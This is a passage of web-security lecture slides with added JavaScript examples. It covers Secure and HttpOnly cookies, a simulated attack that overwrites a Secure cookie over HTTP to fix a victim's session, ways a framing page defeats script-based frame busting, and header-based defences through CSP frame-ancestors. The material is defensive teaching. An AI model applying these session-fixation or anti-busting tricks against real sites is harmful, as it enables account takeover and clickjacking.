• Can rewrite secure cookies over HTTP: a Set-Cookie in a plain-HTTP response with the same name, domain and path replaces the stored secure cookie
⇒ network attacker can rewrite secure cookies ⇒ can log the user into the attacker's account (session fixation)
(Browsers since 2016-2017 refuse to let a non-HTTPS response set or overwrite a Secure cookie, the "Leave Secure Cookies Alone" rule now in RFC 6265bis; the __Host- and __Secure- cookie-name prefixes make the same guarantee explicit.)
HttpOnly Cookies
Browser → Server:  GET …
Server → Browser:  HTTP header  Set-Cookie: NAME=VALUE; HttpOnly
• Cookie is sent with HTTP(S) requests, but is not accessible to scripts
• cannot be read (or overwritten) via document.cookie
• Helps prevent cookie theft via XSS
• … but does not stop most other risks of XSS bugs: injected script can still issue requests from the page, and the browser attaches the cookie to them, so the attacker acts as the user without ever seeing the cookie value
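The cookie rules from the last four slides (domain and path scope, Secure, HttpOnly, and the "rewrite a secure cookie over HTTP" attack) are modelled end to end in the added example below. It is not part of the original slides and not a browser implementation: there is no public-suffix list, no storage limit and no SameSite handling, and all host names and token values are constructed. The `strictSecure` switch contrasts the legacy behaviour the slides describe with the current "Leave Secure Cookies Alone" rule.

```javascript
// Added example (not from the slides): a minimal cookie jar modelling the scoping
// and flag rules discussed above.  Teaching model only: no public-suffix list,
// no storage limits, no SameSite.  All hosts and cookie values are constructed.

function parseSetCookie(header) {
  const [nameValue, ...attrs] = header.split(";").map(s => s.trim());
  const eq = nameValue.indexOf("=");
  const c = { name: nameValue.slice(0, eq), value: nameValue.slice(eq + 1),
              domain: null, hostOnly: true, path: "/", secure: false, httpOnly: false, session: true };
  for (const attr of attrs) {
    const i = attr.indexOf("=");
    const key = (i < 0 ? attr : attr.slice(0, i)).toLowerCase();
    const val = i < 0 ? "" : attr.slice(i + 1);
    if (key === "domain")        { c.domain = val.replace(/^\./, "").toLowerCase(); c.hostOnly = false; }
    else if (key === "path")     c.path = val || "/";
    else if (key === "secure")   c.secure = true;      // bare flag, value ignored
    else if (key === "httponly") c.httpOnly = true;
    else if (key === "expires" || key === "max-age") c.session = false;  // persistent cookie
  }
  return c;
}

// RFC 6265 domain-match: exact host, or host is a subdomain of the cookie domain.
function domainMatches(host, domain) { return host === domain || host.endsWith("." + domain); }
// RFC 6265 path-match.
function pathMatches(reqPath, cookiePath) {
  if (reqPath === cookiePath) return true;
  return reqPath.startsWith(cookiePath) && (cookiePath.endsWith("/") || reqPath[cookiePath.length] === "/");
}

class CookieJar {
  // strictSecure=true models current browsers (RFC 6265bis "Leave Secure Cookies Alone"):
  // a non-HTTPS response can neither set a Secure cookie nor overwrite an existing one.
  constructor({ strictSecure = false } = {}) { this.strictSecure = strictSecure; this.cookies = []; }

  // Process one Set-Cookie header from a response for responseUrl; returns true if stored.
  store(responseUrl, header) {
    const url = new URL(responseUrl), host = url.hostname.toLowerCase();
    const c = parseSetCookie(header);
    if (c.domain === null) c.domain = host;               // no Domain attribute: host-only cookie
    else if (!domainMatches(host, c.domain)) return false; // may only widen to a parent domain
    if (url.protocol !== "https:" && this.strictSecure) {
      const clash = this.cookies.some(e => e.secure && e.name === c.name &&
        (domainMatches(c.domain, e.domain) || domainMatches(e.domain, c.domain)));
      if (c.secure || clash) return false;
    }
    // Same (name, domain, path) replaces the stored cookie: this is what lets an
    // http:// response overwrite a Secure cookie in the legacy (non-strict) model.
    const idx = this.cookies.findIndex(e => e.name === c.name && e.domain === c.domain && e.path === c.path);
    if (idx >= 0) this.cookies[idx] = c; else this.cookies.push(c);
    return true;
  }

  // Cookies the browser would attach to a request for requestUrl.
  send(requestUrl) {
    const url = new URL(requestUrl), host = url.hostname.toLowerCase();
    return this.cookies.filter(c =>
      (c.hostOnly ? host === c.domain : domainMatches(host, c.domain)) &&
      pathMatches(url.pathname, c.path) &&
      (!c.secure || url.protocol === "https:"));            // Secure: confidentiality only
  }
  cookieHeader(requestUrl) { return this.send(requestUrl).map(c => `${c.name}=${c.value}`).join("; "); }
  // What document.cookie exposes to script running on pageUrl: HttpOnly cookies are hidden.
  documentCookie(pageUrl) {
    return this.send(pageUrl).filter(c => !c.httpOnly).map(c => `${c.name}=${c.value}`).join("; ");
  }
}

// The slide's attack, end to end.  Returns what each party observes under the given browser model.
function runScenario(strictSecure) {
  const jar = new CookieJar({ strictSecure });
  // 1. Login over HTTPS; the server sets the session cookie with both flags.
  jar.store("https://www.bank.example/login.cgi", "auth=victim_token; Secure; HttpOnly; Path=/");
  const overHttps = jar.cookieHeader("https://www.bank.example/account");  // sent
  const overHttp  = jar.cookieHeader("http://www.bank.example/");          // withheld: Secure
  const toScript  = jar.documentCookie("https://www.bank.example/account"); // empty: HttpOnly
  // 2. The user later fetches any http://www.bank.example/ URL; an active network
  //    attacker forges that response and includes a Set-Cookie for the attacker's session.
  const accepted = jar.store("http://www.bank.example/", "auth=attacker_token; Secure; Path=/");
  // 3. The next HTTPS request carries whichever token survived.
  const afterAttack = jar.cookieHeader("https://www.bank.example/account");
  return { overHttps, overHttp, toScript, accepted, afterAttack };
}

console.log("legacy browser:", runScenario(false));  // afterAttack: auth=attacker_token
console.log("strict browser:", runScenario(true));   // afterAttack: auth=victim_token
```

Note that even the strict model only protects the cookie's integrity against a network attacker; it does nothing about an XSS on any *.bank.example host, which can still set a cookie for the parent domain from script unless the cookie is named with the __Host- prefix.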
FRAMES AND FRAME BUSTING
Frames
Embed HTML documents in other documents
<iframe name="myframe" src="http://www.google.com/">
  This text is ignored by most browsers.
</iframe>
Frame Busting
Goal: prevent a web page from loading in a frame
• example: opening the login page in a frame will display the correct passmark image, so an attacker's page that frames it borrows the bank's anti-phishing reassurance
Frame busting:
if (top != self) top.location.href = location.href
Better Frame Busting
Problem: the framing page can cancel the busting navigation with a JavaScript onUnload/onBeforeUnload handler, e.g. (cause_an_abort is a placeholder name)
<body onUnload="cause_an_abort();">
Try this instead: keep the page's own content inside the else branch, so a framer who blocks the navigation gets an empty page rather than a usable one
if (top != self) top.location.href = location.href
else { … code of page here …}
Even this fails against a framer that sandboxes the iframe: without allow-scripts the busting code never runs, and without allow-top-navigation it is not permitted to navigate top. The robust defence is server-side, the X-Frame-Options header or the CSP frame-ancestors directive, which the browser enforces before any script in the framed page runs.
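The header-based replacement for JavaScript frame busting, as an added example that is not part of the original slides: `buildAntiFramingHeaders` emits the two response headers a server should send, and `isFramingAllowed` models how a browser evaluates the CSP `frame-ancestors` directive against the whole chain of framing origins. The origins used are constructed for the example, and the host-source matcher covers scheme, wildcard host and port but not every corner of the CSP grammar.

```javascript
// Added example (not from the slides): header-based anti-framing and a model of
// how the browser evaluates CSP frame-ancestors.  Origins below are constructed.

function buildAntiFramingHeaders({ allowSelf = false, allowed = [] } = {}) {
  const sources = [...(allowSelf ? ["'self'"] : []), ...allowed];
  const headers = {
    "Content-Security-Policy": `frame-ancestors ${sources.length ? sources.join(" ") : "'none'"}`,
  };
  // Legacy header for browsers without CSP 2.  It can only say DENY or SAMEORIGIN;
  // browsers that understand both ignore it in favour of frame-ancestors.
  headers["X-Frame-Options"] = sources.length === 0 ? "DENY" : "SAMEORIGIN";
  return headers;
}

// Parse a CSP host-source such as "https://*.partner.example:443" or "partner.example".
function parseHostSource(src) {
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:\/]+)(?::(\d+|\*))?$/i.exec(src);
  if (!m) return null;
  return { scheme: m[1] ? m[1].toLowerCase() : null, wildcard: !!m[2],
           host: m[3].toLowerCase(), port: m[4] || null };
}

// Does one source expression admit ancestorOrigin as a framer of pageOrigin?
function sourceMatches(src, pageOrigin, ancestorOrigin) {
  if (src === "'none'") return false;
  if (src === "'self'") return ancestorOrigin === pageOrigin;
  if (src === "*") return true;
  const s = parseHostSource(src);
  if (!s) return false;
  const a = new URL(ancestorOrigin);
  const aScheme = a.protocol.slice(0, -1);
  const pageScheme = new URL(pageOrigin).protocol.slice(0, -1);
  // No scheme in the source: match the page's scheme, and accept https for an http page.
  const schemeOk = s.scheme ? s.scheme === aScheme
                            : aScheme === pageScheme || (pageScheme === "http" && aScheme === "https");
  // "*.host" matches subdomains only, never the bare host.
  const hostOk = s.wildcard ? a.hostname.endsWith("." + s.host) : a.hostname === s.host;
  const aPort = a.port || (aScheme === "https" ? "443" : "80");
  const portOk = !s.port || s.port === "*" || s.port === aPort;
  return schemeOk && hostOk && portOk;
}

// The page may be framed only if every ancestor (parent, grandparent, ...) matches
// some source; one hostile ancestor anywhere in the chain blocks the load.
function isFramingAllowed(cspHeader, pageOrigin, ancestorOrigins) {
  const directive = cspHeader.split(";").map(d => d.trim()).find(d => d.startsWith("frame-ancestors"));
  if (!directive) return true;    // no directive: CSP does not restrict framing
  const sources = directive.split(/\s+/).slice(1);
  return ancestorOrigins.every(anc => sources.some(src => sourceMatches(src, pageOrigin, anc)));
}

const BANK = "https://www.bank.example";
const bankHeaders = buildAntiFramingHeaders({ allowSelf: true, allowed: ["https://*.partner.example"] });
console.log(bankHeaders);
console.log(isFramingAllowed(bankHeaders["Content-Security-Policy"], BANK, ["https://evil.example"])); // false
```

Send both headers on every response that renders a document, including error pages; the login page that needed the JavaScript busting above is exactly the one that must never depend on script running in the attacker's chosen frame.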
Summary
• HTTP
• Rendering content
• Isolation
• Communication
• Navigation
• Security user interface
• Cookies
• Frames and frame busting